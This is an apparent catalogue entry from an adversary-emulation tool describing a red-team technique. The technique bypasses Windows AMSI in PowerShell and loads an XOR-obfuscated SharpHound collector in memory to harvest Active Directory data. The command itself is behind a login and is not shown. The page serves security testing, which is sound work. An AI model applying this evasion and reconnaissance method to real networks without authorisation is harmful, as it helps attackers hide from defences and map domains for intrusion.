Bypass AMSI, load, and run XOR'd SharpHound payload

BloodHound uses .NET API calls in the SharpHound ingestor component to pull Active Directory data. This uses an existing XOR'd SharpHound payload on disk to load and run BloodHound in memory. This bypasses the Anti-malware scanning interface (AMSI) in the current powershell process to allow loading of SharpHound.
View Command

To view this TTPs command, you must be logged in with a professional or enterprise license.


Test this TTP

Download Operator (1.7.0)
Test this TTP using one of our Operator chains


Ingress, load, and run the SharpHound collector.